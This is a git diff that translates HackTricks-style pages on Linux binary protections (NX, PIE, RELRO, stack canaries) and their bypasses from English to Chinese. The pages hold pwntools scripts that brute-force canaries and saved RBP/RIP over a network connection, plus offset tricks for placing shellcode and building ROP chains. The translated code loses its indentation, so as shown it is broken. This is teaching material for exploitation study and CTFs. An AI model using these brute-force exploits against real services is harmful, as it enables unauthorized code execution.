+- 64 位，启用 ASLR，没有 canary，主函数中的堆栈溢出来自子函数。ROP gadget 调用 puts 以泄露 GOT 中 puts 的地址，然后调用一个 gadget。
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
index b18b18057..07b6735a8 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
@@ -2,16 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel terminology, is a hardware-based security feature designed to **mitigate** the effects of **buffer overflow** attacks. When implemented and enabled, it distinguishes between memory regions that are intended for **executable code** and those meant for **data**, such as the **stack** and **heap**. The core idea is to prevent an attacker from executing malicious code through buffer overflow vulnerabilities by putting the malicious code in the stack for example and directing the execution flow to it.
+**No-Execute (NX)** 位，也称为 **Execute Disable (XD)** 在英特尔术语中，是一种基于硬件的安全特性，旨在 **减轻** **缓冲区溢出** 攻击的影响。当实施并启用时，它区分了用于 **可执行代码** 的内存区域和用于 **数据** 的区域，例如 **栈** 和 **堆**。核心思想是通过将恶意代码放入栈中并将执行流指向它，来防止攻击者通过缓冲区溢出漏洞执行恶意代码。
 
-## Bypasses
+## 绕过方法
 
-- It's possible to use techniques such as [**ROP**](../stack-overflow/rop-return-oriented-programing.md) to bypass this protection by executing chunks of executable code already present in the binary.
-  - [**Ret2libc**](../stack-overflow/ret2lib/)
-  - [**Ret2syscall**](../stack-overflow/rop-syscall-execv.md)
-  - **Ret2...**
+- 可以使用诸如 [**ROP**](../stack-overflow/rop-return-oriented-programing.md) 的技术，通过执行二进制文件中已经存在的可执行代码块来绕过此保护。
+- [**Ret2libc**](../stack-overflow/ret2lib/)
+- [**Ret2syscall**](../stack-overflow/rop-syscall-execv.md)
+- **Ret2...**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
index e5a76b498..9248f8c6c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
@@ -2,32 +2,31 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-A binary compiled as PIE, or **Position Independent Executable**, means the **program can load at different memory locations** each time it's executed, preventing hardcoded addresses.
+编译为 PIE（**位置无关可执行文件**）的二进制文件意味着 **程序每次执行时可以加载到不同的内存位置**，防止硬编码地址。
 
-The trick to exploit these binaries lies in exploiting the **relative addresses**—the offsets between parts of the program remain the same even if the absolute locations change. To **bypass PIE, you only need to leak one address**, typically from the **stack** using vulnerabilities like format string attacks. Once you have an address, you can calculate others by their **fixed offsets**.
+利用这些二进制文件的技巧在于利用 **相对地址**——程序各部分之间的偏移量即使绝对位置改变也保持不变。要 **绕过 PIE，您只需泄露一个地址**，通常通过格式字符串攻击等漏洞从 **栈** 中获取。一旦您有了一个地址，您可以通过它们的 **固定偏移量** 计算其他地址。
 
-A helpful hint in exploiting PIE binaries is that their **base address typically ends in 000** due to memory pages being the units of randomization, sized at 0x1000 bytes. This alignment can be a critical **check if an exploit isn't working** as expected, indicating whether the correct base address has been identified.\
-Or you can use this for your exploit, if you leak that an address is located at **`0x649e1024`** you know that the **base address is `0x649e1000`** and from the you can just **calculate offsets** of functions and locations.
+在利用 PIE 二进制文件时，一个有用的提示是它们的 **基地址通常以 000 结尾**，因为内存页是随机化的单位，大小为 0x1000 字节。如果一个漏洞没有按预期工作，这种对齐可以是一个关键的 **检查**，指示是否已识别正确的基地址。\
+或者您可以将其用于您的漏洞利用，如果您泄露了一个地址位于 **`0x649e1024`**，您就知道 **基地址是 `0x649e1000`**，然后您可以 **计算** 函数和位置的偏移量。
 
-## Bypasses
+## 绕过方法
 
-In order to bypass PIE it's needed to **leak some address of the loaded** binary, there are some options for this:
+为了绕过 PIE，需要 **泄露已加载二进制文件的某个地址**，有一些选项可以做到这一点：
 
-- **Disabled ASLR**: If ASLR is disabled a binary compiled with PIE is always **going to be loaded in the same address**, therefore **PIE is going to be useless** as the addresses of the objects are always going to be in the same place.
-- Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit))
-- **Brute-force EBP and EIP values** in the stack until you leak the correct ones:
+- **禁用 ASLR**：如果 ASLR 被禁用，编译为 PIE 的二进制文件总是 **会加载到相同的地址**，因此 **PIE 将变得无用**，因为对象的地址总是会在同一位置。
+- 被 **给出** 泄露（在简单的 CTF 挑战中常见， [**查看这个例子**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)）
+- 在栈中 **暴力破解 EBP 和 EIP 值**，直到您泄露正确的值：
 
 {{#ref}}
 bypassing-canary-and-pie.md
 {{#endref}}
 
-- Use an arbitrary read vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
+- 使用任意读取漏洞，例如 [**格式字符串**](../../format-strings/) 来泄露二进制文件的地址（例如，从栈中，如前面的技术所示）以获取二进制文件的基地址并从那里使用偏移量。[**在这里找到一个例子**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass)。
 
-## References
+## 参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index 042e036ba..b75f8c463 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -1,56 +1,55 @@
-# BF Addresses in the Stack
+# BF 地址在栈中
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
+**如果你面临一个受到 canary 和 PIE（位置无关可执行文件）保护的二进制文件，你可能需要找到一种方法来绕过它们。**
 
 ![](<../../../../images/image (144).png>)
 
 > [!NOTE]
-> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
-> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
+> 请注意，**`checksec`** 可能无法发现一个二进制文件受到 canary 保护，如果它是静态编译的，并且无法识别该函数。\
+> 然而，如果你发现一个值在函数调用开始时保存在栈中，并且在退出之前检查了这个值，你可以手动注意到这一点。
 
-## Brute-Force Addresses
+## 暴力破解地址
 
-In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
-For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
+为了绕过 PIE，你需要 **泄露一些地址**。如果二进制文件没有泄露任何地址，最好的方法是 **暴力破解在脆弱函数中保存的 RBP 和 RIP**。\
+例如，如果一个二进制文件同时受到 **canary** 和 **PIE** 的保护，你可以开始暴力破解 canary，然后 **接下来的** 8 字节（x64）将是保存的 **RBP**，**接下来的** 8 字节将是保存的 **RIP**。
 
 > [!TIP]
-> It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case.
-
-To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
+> 假设栈中的返回地址属于主二进制代码，如果漏洞位于二进制代码中，通常会是这种情况。
 
+要从二进制文件中暴力破解 RBP 和 RIP，你可以判断一个有效的猜测字节是否正确，如果程序输出了某些内容或者它没有崩溃。可以使用与暴力破解 canary 提供的 **相同函数** 来暴力破解 RBP 和 RIP：
 ```python
 from pwn import *
 
 def connect():
-    r = remote("localhost", 8788)
+r = remote("localhost", 8788)
 
 def get_bf(base):
-    canary = ""
-    guess = 0x0
-    base += canary
+canary = ""
+guess = 0x0
+base += canary
 
-    while len(canary) < 8:
-        while guess != 0xff:
-            r = connect()
+while len(canary) < 8:
+while guess != 0xff:
+r = connect()
 
-            r.recvuntil("Username: ")
-            r.send(base + chr(guess))
+r.recvuntil("Username: ")
+r.send(base + chr(guess))
 
-            if "SOME OUTPUT" in r.clean():
-                print "Guessed correct byte:", format(guess, '02x')
-                canary += chr(guess)
-                base += chr(guess)
-                guess = 0x0
-                r.close()
-                break
-            else:
-                guess += 1
-                r.close()
+if "SOME OUTPUT" in r.clean():
+print "Guessed correct byte:", format(guess, '02x')
+canary += chr(guess)
+base += chr(guess)
+guess = 0x0
+r.close()
+break
+else:
+guess += 1
+r.close()
 
-    print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
-    return base
+print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
+return base
 
 # CANARY BF HERE
 canary_offset = 1176
@@ -67,25 +66,19 @@ print("Brute-Forcing RIP")
 base_canary_rbp_rip = get_bf(base_canary_rbp)
 RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
 ```
+要击败 PIE，您需要做的最后一件事是计算 **从泄露的** 地址中得出的 **有用地址**：**RBP** 和 **RIP**。
 
-The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
-
-From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
-
+从 **RBP** 您可以计算 **您在栈中写入 shell 的位置**。这对于知道您将要在栈中写入字符串 _"/bin/sh\x00"_ 的位置非常有用。要计算泄露的 RBP 和您的 shellcode 之间的距离，您只需在泄露 RBP 后放置一个 **断点**，并检查 **您的 shellcode 位于何处**，然后，您可以计算 shellcode 和 RBP 之间的距离：
 ```python
 INI_SHELLCODE = RBP - 1152
 ```
-
-From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
-To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
+从 **RIP** 中可以计算出 **PIE 二进制文件的基地址**，这是创建 **有效 ROP 链** 所需的。\
+要计算基地址，只需执行 `objdump -d vunbinary` 并检查最新的反汇编地址：
 
 ![](<../../../../images/image (145).png>)
 
-In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000`
-
+在这个例子中，您可以看到只需要 **1.5 字节** 来定位所有代码，因此，在这种情况下，基地址将是 **泄漏的 RIP，但以 "000" 结尾**。例如，如果您泄漏了 `0x562002970ecf`，则基地址为 `0x562002970000`。
 ```python
 elf.address = RIP - (RIP & 0xfff)
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
index a50cebd5e..34c17538c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
@@ -4,31 +4,28 @@
 
 ## Relro
 
-**RELRO** stands for **Relocation Read-Only**, and it's a security feature used in binaries to mitigate the risks associated with **GOT (Global Offset Table)** overwrites. Let's break down the concept into its two distinct types for clarity: **Partial RELRO** and **Full RELRO**.
+**RELRO** 代表 **Relocation Read-Only**，它是用于二进制文件的安全特性，旨在减轻与 **GOT (Global Offset Table)** 覆盖相关的风险。让我们将这个概念分解为两个不同的类型以便于理解：**部分 RELRO** 和 **完全 RELRO**。
 
-### **Partial RELRO**
+### **部分 RELRO**
 
-**Partial RELRO** takes a simpler approach to enhance security without significantly impacting the binary's performance. By **positioning the GOT above the program's variables in memory, Partial RELRO aims to prevent buffer overflows from reaching and corrupting the GOT**.&#x20;
+**部分 RELRO** 采用更简单的方法来增强安全性，而不会显著影响二进制文件的性能。通过 **将 GOT 放置在程序变量的上方，部分 RELRO 旨在防止缓冲区溢出到达并破坏 GOT**。&#x20;
 
-This **doesn't prevent the GOT** to be abused **from arbitrary write** vulnerabilities.
+这 **并不防止 GOT** 被 **任意写入** 漏洞利用。
 
-### **Full RELRO**
+### **完全 RELRO**
 
-**Full RELRO** steps up the protection by **making the GOT completely read-only.** Once the binary starts all the function addresses are resolved and loaded in the GOT, then, GOT is marked as read-only, effectively preventing any modifications to it during runtime.
+**完全 RELRO** 通过 **使 GOT 完全只读** 来加强保护。一旦二进制文件启动，所有函数地址都会在 GOT 中解析并加载，然后，GOT 被标记为只读，有效地防止在运行时对其进行任何修改。
 
-However, the trade-off with Full RELRO is in terms of performance and startup time. Because it needs to resolve all dynamic symbols at startup before marking the GOT as read-only, **binaries with Full RELRO enabled may experience longer load times**. This additional startup overhead is why Full RELRO is not enabled by default in all binaries.
-
-It's possible to see if Full RELRO is enabled in a binary with:
+然而，完全 RELRO 的权衡在于性能和启动时间。因为它需要在启动时解析所有动态符号，然后再将 GOT 标记为只读，**启用完全 RELRO 的二进制文件可能会经历更长的加载时间**。这种额外的启动开销就是为什么并非所有二进制文件默认启用完全 RELRO。
 
+可以通过以下方式查看二进制文件是否启用了完全 RELRO：
 ```bash
 readelf -l /proc/ID_PROC/exe | grep BIND_NOW
 ```
+## 绕过
 
-## Bypass
+如果启用了完整的 RELRO，绕过它的唯一方法是找到另一种不需要写入 GOT 表以获得任意执行的方法。
 
-If Full RELRO is enabled, the only way to bypass it is to find another way that doesn't need to write in the GOT table to get arbitrary execution.
-
-Note that LIBC's GOT is usually Partial RELRO, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries).
+请注意，LIBC 的 GOT 通常是部分 RELRO，因此可以通过任意写入进行修改。更多信息请参见 [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
index acf11cf1e..5f8d173c6 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
@@ -2,70 +2,69 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## **StackGuard and StackShield**
+## **StackGuard 和 StackShield**
 
-**StackGuard** inserts a special value known as a **canary** before the **EIP (Extended Instruction Pointer)**, specifically `0x000aff0d` (representing null, newline, EOF, carriage return) to protect against buffer overflows. However, functions like `recv()`, `memcpy()`, `read()`, and `bcopy()` remain vulnerable, and it does not protect the **EBP (Base Pointer)**.
+**StackGuard** 在 **EIP (扩展指令指针)** 之前插入一个特殊值，称为 **canary**，具体为 `0x000aff0d`（表示空值、换行符、EOF、回车）以防止缓冲区溢出。然而，像 `recv()`、`memcpy()`、`read()` 和 `bcopy()` 这样的函数仍然存在漏洞，并且它不保护 **EBP (基指针)**。
 
-**StackShield** takes a more sophisticated approach than StackGuard by maintaining a **Global Return Stack**, which stores all return addresses (**EIPs**). This setup ensures that any overflow does not cause harm, as it allows for a comparison between stored and actual return addresses to detect overflow occurrences. Additionally, StackShield can check the return address against a boundary value to detect if the **EIP** points outside the expected data space. However, this protection can be circumvented through techniques like Return-to-libc, ROP (Return-Oriented Programming), or ret2ret, indicating that StackShield also does not protect local variables.
+**StackShield** 采用比 StackGuard 更复杂的方法，通过维护一个 **全局返回栈**，存储所有返回地址 (**EIPs**)。这种设置确保任何溢出不会造成伤害，因为它允许比较存储的和实际的返回地址以检测溢出发生。此外，StackShield 可以检查返回地址与边界值的关系，以检测 **EIP** 是否指向预期数据空间之外。然而，这种保护可以通过 Return-to-libc、ROP（面向返回的编程）或 ret2ret 等技术绕过，这表明 StackShield 也不保护局部变量。
 
 ## **Stack Smash Protector (ProPolice) `-fstack-protector`:**
 
-This mechanism places a **canary** before the **EBP**, and reorganizes local variables to position buffers at higher memory addresses, preventing them from overwriting other variables. It also securely copies arguments passed on the stack above local variables and uses these copies as arguments. However, it does not protect arrays with fewer than 8 elements or buffers within a user's structure.
+该机制在 **EBP** 之前放置一个 **canary**，并重新组织局部变量以将缓冲区放置在更高的内存地址，从而防止它们覆盖其他变量。它还安全地复制传递到栈上的参数，并使用这些副本作为参数。然而，它不保护少于 8 个元素的数组或用户结构中的缓冲区。
 
-The **canary** is a random number derived from `/dev/urandom` or a default value of `0xff0a0000`. It is stored in **TLS (Thread Local Storage)**, allowing shared memory spaces across threads to have thread-specific global or static variables. These variables are initially copied from the parent process, and child processes can alter their data without affecting the parent or siblings. Nevertheless, if a **`fork()` is used without creating a new canary, all processes (parent and children) share the same canary**, making it vulnerable. On the **i386** architecture, the canary is stored at `gs:0x14`, and on **x86_64**, at `fs:0x28`.
+**canary** 是从 `/dev/urandom` 派生的随机数或默认值 `0xff0a0000`。它存储在 **TLS (线程局部存储)** 中，允许跨线程共享内存空间具有线程特定的全局或静态变量。这些变量最初从父进程复制，子进程可以在不影响父进程或兄弟进程的情况下更改其数据。然而，如果 **`fork()` 在不创建新 canary 的情况下使用，所有进程（父进程和子进程）共享相同的 canary**，使其变得脆弱。在 **i386** 架构中，canary 存储在 `gs:0x14`，在 **x86_64** 中，存储在 `fs:0x28`。
 
-This local protection identifies functions with buffers vulnerable to attacks and injects code at the start of these functions to place the canary, and at the end to verify its integrity.
+这种本地保护识别具有缓冲区的函数，这些缓冲区易受攻击，并在这些函数的开头注入代码以放置 canary，在结尾验证其完整性。
 
-When a web server uses `fork()`, it enables a brute-force attack to guess the canary byte by byte. However, using `execve()` after `fork()` overwrites the memory space, negating the attack. `vfork()` allows the child process to execute without duplication until it attempts to write, at which point a duplicate is created, offering a different approach to process creation and memory handling.
+当 Web 服务器使用 `fork()` 时，它允许通过逐字节猜测 canary 字节进行暴力攻击。然而，在 `fork()` 之后使用 `execve()` 会覆盖内存空间，从而消除攻击。`vfork()` 允许子进程在尝试写入之前执行而不进行复制，此时会创建一个副本，提供了一种不同的进程创建和内存处理方法。
 
-### Lengths
+### 长度
 
-In `x64` binaries, the canary cookie is an **`0x8`** byte qword. The **first seven bytes are random** and the last byte is a **null byte.**
+在 `x64` 二进制文件中，canary cookie 是一个 **`0x8`** 字节的 qword。**前七个字节是随机的**，最后一个字节是 **空字节**。
 
-In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst three bytes are random** and the last byte is a **null byte.**
+在 `x86` 二进制文件中，canary cookie 是一个 **`0x4`** 字节的 dword。**前三个字节是随机的**，最后一个字节是 **空字节**。
 
 > [!CAUTION]
-> The least significant byte of both canaries is a null byte because it'll be the first in the stack coming from lower addresses and therefore **functions that read strings will stop before reading it**.
+> 两个 canary 的最低有效字节是空字节，因为它将是来自较低地址的栈中的第一个，因此 **读取字符串的函数将在读取之前停止**。
 
-## Bypasses
+## 绕过
 
-**Leaking the canary** and then overwriting it (e.g. buffer overflow) with its own value.
+**泄露 canary** 然后用其自身的值覆盖它（例如，缓冲区溢出）。
 
-- If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time:
+- 如果 **canary 在子进程中被 fork**，可能可以 **逐字节暴力破解** 它：
 
 {{#ref}}
 bf-forked-stack-canaries.md
 {{#endref}}
 
-- If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it:
+- 如果二进制文件中存在一些有趣的 **泄露或任意读取漏洞**，可能可以泄露它：
 
 {{#ref}}
 print-stack-canary.md
 {{#endref}}
 
-- **Overwriting stack stored pointers**
+- **覆盖栈存储的指针**
 
-The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check:
+易受栈溢出影响的栈可能 **包含可以被覆盖的字符串或函数的地址**，以利用该漏洞而无需到达栈 canary。检查：
 
 {{#ref}}
 ../../stack-overflow/pointer-redirecting.md
 {{#endref}}
 
-- **Modifying both master and thread canary**
+- **修改主 canary 和线程 canary**
 
-A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the thread. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).
+在受 canary 保护的线程函数中的缓冲区溢出可以用来修改线程的主 canary。因此，缓解措施是无效的，因为检查是使用两个相同的（尽管已修改）canary。
 
-- **Modify the GOT entry of `__stack_chk_fail`**
+- **修改 `__stack_chk_fail` 的 GOT 条目**
 
-If the binary has Partial RELRO, then you can use an arbitrary write to modify the GOT entry of `__stack_chk_fail` to be a dummy function that does not block the program if the canary gets modified.
+如果二进制文件具有部分 RELRO，则可以使用任意写入修改 `__stack_chk_fail` 的 GOT 条目，使其成为一个不会阻止程序的虚拟函数，如果 canary 被修改。
 
-## References
+## 参考
 
 - [https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html](https://guyinatuxedo.github.io/7.1-mitigation_canary/index.html)
 - [http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads](http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads)
-  - 64 bits, no PIE, nx, modify thread and master canary.
+- 64 位，无 PIE，nx，修改线程和主 canary。
 - [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/)
-  - 64 bits, no PIE, nx, write-what-where primitive. Modify GOT entry of `__stack_chk_fail`.
+- 64 位，无 PIE，nx，write-what-where 原语。修改 `__stack_chk_fail` 的 GOT 条目。
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index b54248b8b..e97d7d928 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -2,55 +2,54 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
+**如果你面临一个受 canary 和 PIE（位置无关可执行文件）保护的二进制文件，你可能需要找到一种方法来绕过它们。**
 
 ![](<../../../../images/image (144).png>)
 
 > [!NOTE]
-> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
-> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
+> 请注意，**`checksec`** 可能无法发现一个二进制文件受到 canary 保护，如果它是静态编译的，并且无法识别该函数。\
+> 然而，如果你发现一个值在函数调用开始时被保存到栈中，并且在退出之前检查这个值，你可以手动注意到这一点。
 
 ## Brute force Canary
 
-The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
+绕过简单 canary 的最佳方法是，如果二进制文件是一个**每次你与它建立新连接时都会派生子进程的程序**（网络服务），因为每次你连接到它时**将使用相同的 canary**。
 
-Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
+因此，绕过 canary 的最佳方法就是**逐字符暴力破解**，你可以通过检查程序是否崩溃或继续其正常流程来判断猜测的 canary 字节是否正确。在这个例子中，函数**暴力破解一个 8 字节的 canary（x64）**，并通过**检查**服务器是否发送了**响应**来区分正确猜测的字节和错误的字节（在**其他情况下**，另一种方法可以使用**try/except**）：
 
 ### Example 1
 
-This example is implemented for 64bits but could be easily implemented for 32 bits.
-
+这个例子是为 64 位实现的，但可以很容易地为 32 位实现。
 ```python
 from pwn import *
 
 def connect():
-    r = remote("localhost", 8788)
+r = remote("localhost", 8788)
 
 def get_bf(base):
-    canary = ""
-    guess = 0x0
-    base += canary
+canary = ""
+guess = 0x0
+base += canary
 
-    while len(canary) < 8:
-        while guess != 0xff:
-            r = connect()
+while len(canary) < 8:
+while guess != 0xff:
+r = connect()
 
-            r.recvuntil("Username: ")
-            r.send(base + chr(guess))
+r.recvuntil("Username: ")
+r.send(base + chr(guess))
 
-            if "SOME OUTPUT" in r.clean():
-                print "Guessed correct byte:", format(guess, '02x')
-                canary += chr(guess)
-                base += chr(guess)
-                guess = 0x0
-                r.close()
-                break
-            else:
-                guess += 1
-                r.close()
+if "SOME OUTPUT" in r.clean():
+print "Guessed correct byte:", format(guess, '02x')
+canary += chr(guess)
+base += chr(guess)
+guess = 0x0
+r.close()
+break
+else:
+guess += 1
+r.close()
 
-    print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
-    return base
+print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
+return base
 
 canary_offset = 1176
 base = "A" * canary_offset
@@ -58,43 +57,41 @@ print("Brute-Forcing canary")
 base_canary = get_bf(base) #Get yunk data + canary
 CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
 ```
+### 示例 2
 
-### Example 2
-
-This is implemented for 32 bits, but this could be easily changed to 64bits.\
-Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
-
+这是为 32 位实现的，但可以很容易地更改为 64 位。\
+还要注意，对于这个示例，**程序首先期望一个字节来指示输入的大小**和有效负载。
 ```python
 from pwn import *
 
 # Here is the function to brute force the canary
 def breakCanary():
-	known_canary = b""
-	test_canary = 0x0
-	len_bytes_to_read = 0x21
+known_canary = b""
+test_canary = 0x0
+len_bytes_to_read = 0x21
 
-	for j in range(0, 4):
-		# Iterate up to 0xff times to brute force all posible values for byte
-		for test_canary in range(0xff):
-			print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
+for j in range(0, 4):
+# Iterate up to 0xff times to brute force all posible values for byte
+for test_canary in range(0xff):
+print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
 
-			# Send the current input size
-			target.send(len_bytes_to_read.to_bytes(1, "little"))
+# Send the current input size
+target.send(len_bytes_to_read.to_bytes(1, "little"))
 
-			# Send this iterations canary
-			target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
+# Send this iterations canary
+target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
 
-			# Scan in the output, determine if we have a correct value
-			output = target.recvuntil(b"exit.")
-			if b"YUM" in output:
-				# If we have a correct value, record the canary value, reset the canary value, and move on
-				print(" - next byte is: " + hex(test_canary))
-				known_canary = known_canary + test_canary.to_bytes(1, "little")
-				len_bytes_to_read += 1
-				break
+# Scan in the output, determine if we have a correct value
+output = target.recvuntil(b"exit.")
+if b"YUM" in output:
+# If we have a correct value, record the canary value, reset the canary value, and move on
+print(" - next byte is: " + hex(test_canary))
+known_canary = known_canary + test_canary.to_bytes(1, "little")
+len_bytes_to_read += 1
+break
 
-	# Return the canary
-	return known_canary
+# Return the canary
+return known_canary
 
 # Start the target process
 target = process('./feedme')
@@ -104,17 +101,15 @@ target = process('./feedme')
 canary = breakCanary()
 log.info(f"The canary is: {canary}")
 ```
+## 线程
 
-## Threads
+同一进程的线程将**共享相同的 canary token**，因此如果二进制文件在每次发生攻击时生成一个新线程，就有可能**暴力破解**一个 canary。&#x20;
 
-Threads of the same process will also **share the same canary token**, therefore it'll be possible to **brute-force** a canary if the binary spawns a new thread every time an attack happens.&#x20;
+在受 canary 保护的线程函数中发生的缓冲区溢出可以用来修改进程的主 canary。因此，这种缓解措施是无效的，因为检查是使用两个相同的 canary（尽管已被修改）。
 
-A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the process. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).
-
-### Example
-
-The following program is vulnerable to Buffer Overflow, but it is compiled with canary:
+### 示例
 
+以下程序易受缓冲区溢出攻击，但它是用 canary 编译的：
 ```c
 #include <pthread.h>
 #include <stdlib.h>
